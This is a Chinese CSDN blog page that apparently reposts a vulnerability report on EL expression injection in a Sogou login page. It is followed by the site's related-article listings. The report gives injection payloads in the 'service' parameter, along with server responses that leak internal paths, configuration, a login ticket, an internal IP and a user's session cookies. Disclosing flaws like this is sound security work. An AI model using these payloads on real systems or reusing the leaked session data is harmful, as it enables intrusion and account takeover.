java el 表达式_JAVA WEB EL表达式注入

最新推荐文章于 2023-09-10 22:58:24 发布
最新推荐文章于 2023-09-10 22:58:24 发布
阅读量171 收藏
点赞数
文章标签: java el 表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36132766/article/details/114414926
版权

#1 漏洞地址

code 区域

https://auth.p4p.sogou.com/login?service=${1000-900}

code 区域

https://auth.p4p.sogou.com/login?service=${pageContext}

action="/login?service=com.caucho.jsp.PageContextImpl@2aaf3a58" method="post">

#2 表达式执行后的结果返回在页面

59b6929b9c06f14be00da654ef4a45765856af23.jpg

获取web路径

${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

file:/opt/local/resin/

code 区域

https://auth.p4p.sogou.com/login?service=${requestScope}

{javax.servlet.jsp.jstl.fmt.locale=zh_CN, org.springframework.validation.BindingResult.credentials=org.springframework.webflow.mvc.view.BindingModel: 0 errors, flashScope=map[[empty]], flowExecutionUrl=/login?service=%5BLjava.lang.String%3B%40660b2cde, warnCookieValue=false, javax.servlet.forward.servlet_path=/login, org.springframework.web.servlet.support.RequestContext.CONTEXT=Flow ApplicationContext [login]: startup date [Tue Apr 12 21:38:02 CST 2016]; parent: WebApplicationContext for namespace 'eunomia-servlet', org.springframework.web.servlet.DispatcherServlet.THEME_SOURCE=WebApplicationContext for namespace 'eunomia-servlet': startup date [Tue Apr 12 21:37:56 CST 2016]; parent: Root WebApplicationContext, caucho.forward=true, javax.servlet.forward.request_uri=/login, javax.servlet.forward.query_string=service=${requestScope}, loginTicket=LT-16293-w2RJq4zIVtOY04HWxDFFgagPRy271m, javax.servlet.forward.context_path=, phoneValidationModel=com.sogou.bizdev.eunomia.validation.phone.PhoneValidationModel@2da91c3c, org.springframework.web.servlet.FlashMapManager.OUTPUT_FLASH_MAP=[Attributes={}, targetRequestPath=null, targetRequestParams={}], flowRequestContext=[RequestControlContextImpl@4bab0382 externalContext = org.springframework.webflow.mvc.servlet.MvcExternalContext@4873729d, currentEvent = viewAcountLogin, requestScope = map[[empty]], attributes = map[[empty]], messageContext = [DefaultMessageContext@1369c694 sourceMessages = map[[null] -> list[[empty]]]], flowExecution = [FlowExecutionImpl@56c2881 flow = 'login', flowSessions = list[[FlowSessionImpl@7fd72fee flow = 'login', state = 'accountViewLoginForm', scope = map['phoneValidationModel' -> com.sogou.bizdev.eunomia.validation.phone.PhoneValidationModel@2da91c3c, 'loginTicket' -> 'LT-16293-w2RJq4zIVtOY04HWxDFFgagPRy271m', 'service' -> ${requestScope}, 'credentials' -> [username: null], 'warnCookieValue' -> false, 'ticketGrantingTicketId' -> [null], 'viewScope' -> map['commandName' -> 'credentials']]]]]], viewScope=map['commandName' -> 'credentials'], javax.servlet.jsp.jstl.fmt.localizationContext=org.springframework.web.servlet.support.JstlUtils$SpringLocalizationContext@88bf3d4, org.springframework.web.servlet.DispatcherServlet.LOCALE_RESOLVER=org.springframework.web.servlet.i18n.CookieLocaleResolver@1c34e7ae, org.springframework.web.servlet.DispatcherServlet.CONTEXT=WebApplicationContext for namespace 'eunomia-servlet': startup date [Tue Apr 12 21:37:56 CST 2016]; parent: Root WebApplicationContext, org.springframework.web.servlet.DispatcherServlet.THEME_RESOLVER=org.jasig.cas.services.web.ServiceThemeResolver@55565ef9, flowExecutionKey=e110s1, service=${requestScope}, commandName=credentials, encodingFilter.FILTERED=true, credentials=[username: null]}

code 区域

https://auth.p4p.sogou.com/login?service=${header}

{Upgrade-Insecure-Requests=1, Accept-Language=zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4, Cookie=SUV=1446734204911570; IPLOC=CN4401; SUID=BA5782774FC80D0A00000000563B6987; pgv_pvi=3484909568; sct=4; LSTMV=703%2C260; LCLKINT=108193; CXID=5CE9FE68778002DCEC30C2A9412EBA10; GOTO=; ad=3wENElllll2Q7p51lllllVtpqM7lllllNcJUWlllll9lllllxTDll5@@@@@@@@@@; _euid=75841017-9d86-4069-9421-d077bd8489ef; JSESSIONID=abcN1iKReDhPacJcOLoqv; session_id_agent_crm=8a089ef7-44bf-493b-81bc-45a327cf03ec, Host=auth.p4p.sogou.com, PROXY_ADDR=10.149.29.104, Accept-Encoding=gzip, deflate, sdch, X-Real-IP=119.130.85.119, X-Forwarded-For=*******, User-Agent=, Connection=close, Accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8}

ElephantTalk象语
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Javaweb安全——表达式注入EL+SpEL
weixin_43610673的博客
07-22 2924
Java表达式根据框架分为好多种,这里以JSP自带的表达式语言EL和使用较多的Spring框架所支持的SpEL为例。其基本语法为${变量表达式}。
Java安全』EL表达式注入
Ho1aAs‘s Blog
04-02 5031
文章目录前言EL表达式解析启用/禁用EL表达式注入绕过方式1. 反射2. js引擎rce参考引用完 前言 EL表达式全称Express Language EL表达式语法以${}包裹 其他使用方法见参考文章 EL表达式解析启用/禁用 默认为启用,jsp会解析EL表达式,除非配置<%@ page isELIgnored ="true|false" %>,或者是全局pom.xml设置 <jsp-config> <jsp-property-group>
EL表达式
顺其自然~专栏
09-22 308
以MVC模式设计程序,JSP只是视图,视图的任务就是显示响应,而不是在JSP中做任何关于程序控制和业务逻辑的事情。所以在JSP页面中应该尽可能少的、或者是完全不出现Java代码。 在使用JSP标准动作操作 JavaBean时,如果JavaBean的属性是 String类型或者基本类型,则能够实现类型的自动转换,如 JavaBean的属性从String类型可自动转换成int类型。如果 Javabean中的属性不是 String类型和基本类型,而是一个 Object类型,并且属性还有自己的属性,如何获得此 O
Java表达式注入(JSP EL表达式注入
GalaxySpaceX的博客
08-16 1109
Java表达式注入(JSP EL表达式注入
EL表达式漏洞利用
Kawa103的博客
11-23 2455
一、EL表达式简介   EL 全名为Expression Language。EL主要作用:   1、获取数据     EL表达式主要用于替换JSP页面中的脚本表达式,以从各种类型的web域 中检索java对象、获取数据。(某个web域 中的对象,访问javabean的属性、访问list集合、访问map集合、访问数组)   2、执行运算     利用EL表达式可以在JSP页面中执行
java_web_第6章_EL表达式.ppt
03-25
8.1 理解表达式语言 8.2 使用EL运算符 8.3 使用EL访问数据 8.4 在EL中使用函数 8.5 在JSP页面中禁用EL 8.6 小 结
Fel Javael表达式引擎
10-17
Fel轻量级的高效的表达式计算引擎。 Fel在源自于企业项目,设计目标是为了不断变化的功能需求和性能需求.文档中有个别错误,但不影响阅读
Java中使用EL表达式文档
最新发布
04-25
Java中使用EL表达式文档
EL表达式简介_动力节点Java学院整理
08-29
EL(Expression Language)是JavaServer Pages(JSP)技术中的一种强大的表达式语言,用于在JSP页面中简便地访问和操作数据。它的主要目的是简化JSP页面...了解和熟练掌握EL表达式是每个Java Web开发者的基础技能之一。
JSP中EL表达式用法_动力节点Java学院整理
10-19
EL表达式主要用于从JSP页面中的不同域中获取数据、执行基本运算、调用Java方法,并利用EL的隐式对象。下面将详细介绍EL表达式的使用方法。 1. 获取数据: EL表达式通常以`${}`的形式出现,用来从请求、会话、应用或...
CAS SSO 登录时报错: org.springframework.webflow.execution.ActionExecutionException: Exception thrown exec
whyzh的专栏
11-21 8953
org.springframework.webflow.execution.ActionExecutionException: Exception thrown executing [AnnotatedAction@23dcf889 targetAction = [EvaluateAction@40fcc4 expression = authenticationViaFormAction.subm
javaweb(四)EL表达式
m0_53698336的博客
08-20 1124
简介 EL 全名为Expression Language。 EL是一种脚本语言,允许通过JSP访问Java组件(JavaBeans)。自JSP 2.0以来,el表达式语言已经被内置到JSP标签中,用于从JSP中分离Java代码,并允许(比用Java代码)更方便访问Java组件。 作用:替换和简化jsp页面中java代码的编写 语法 ${表达式} EL 语法很简单,它最大的特点就是使用上很方便。接下来介绍EL主要的语法结构: ${sessionScope.user.sex} 所有EL都是以${为起始、以}为结
[Java | Web] JavaWeb——EL表达式
joyride_run的博客
09-10 964
都能使用。
java el 表达式_JavawebEL表达式
weixin_30713183的博客
02-20 636
1.EL表达式简介EL全名为Expression Language。EL的主要作用为:获取数据:EL表达式主要用于替换jsp页面中的脚本表达式,以从各种类型的web域中检索java对象,获取数据。(某个web域中的对象,访问JavaBean的属性,访问list集合,访问map集合,访问数组)执行运算:利用EL表达式可以在JSP页面中执行一些基本的关系运算、逻辑运算和算术运算,以在JSP页面中完成一...
JAVA EL表达式
杉 言
06-09 4812
JAVA中用于取值的语言叫EL表达式。  EL表达式语言(Expression Language),可以简化对变量对象的访问,它的表达式以"${“开始,以”}"结束。  EL表达式的操作内容可以是:常量、变量、jsp隐含对象  EL表达式提供了对操作内容的运算:属性取值、运算、逻辑运算  EL表达式操作结果会自动输出到输出流对象中  EL表达式只能通过内置对象取值,也就是只读操作  在jsp中...
EL表达式详解
Java后端技术栈
06-16 3303
一、EL表达式简介   EL 全名为Expression Language。EL主要作用:  1、获取数据     EL表达式主要用于替换JSP页面中的脚本表达式,以从各种类型的web域 中检索java对象、获取数据。(某个web域 中的对象,访问javabean的属性、访问list集合、访问map集合、访问数组)  2、执行运算     利用EL表达式可以在JSP页面中执行一些基本的关系运算、逻辑运算和算术运算,以在JSP页面中完成一些简单的逻辑运算。${user==null}  3、获取web开发常用
Spring-EL表达式-(对象注入,properties文件注入
qq_41528214的博客
12-04 903
在spring的xml配置文件中 可以使用el表达式 来获取容器中的对象实现引用 #{} ${} 在springxml配置都可以使用 #{} 使用引用对象的 ${}使用引用字符串时用的 Spring的xml配置文件 读取外部properties配置文件 xmlns:context="http://www.springframework.org/schema/context" http://www.springframework.org/schema/context http:/
Java学习篇42-EL表达式&过滤器&监听器
Txtechcom的博客
08-01 483
EL表达式、JSTL、Servlet规范中的过滤器(过滤器入门、过滤器细节、过滤器使用案例)、Servlet规范中的8个监听器、监听器的使用、学生管理系统改造(解决乱码问题、检查登录、页面的java代码块和jsp表达式改造、乱码问题过滤器、检查登录过滤器、jsp页面的改造)
JavaEL表达式
weixin_30616969的博客
08-28 455
ylbtech-JavaEL表达式 EL(Expression Language) 是为了使JSP写起来更加简单。表达式语言的灵感来自于 ECMAScript 和 XPath 表达式语言,它提供了在 JSP 中简化表达式的方法,让Jsp的代码更加简化。 1.返回顶部 1、 1、语法结构 ${expression} 2、[ ]与....
Java Web技术:EL表达式与Filter&Listener讲解
"EL&Filter&Listener-授课" 在Java Web开发中,EL(Expression Language,表达式...EL表达式Java Web开发中提高效率、提升代码质量的重要工具,它使得页面和业务逻辑的分离更为彻底,为开发者提供了更好的开发体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值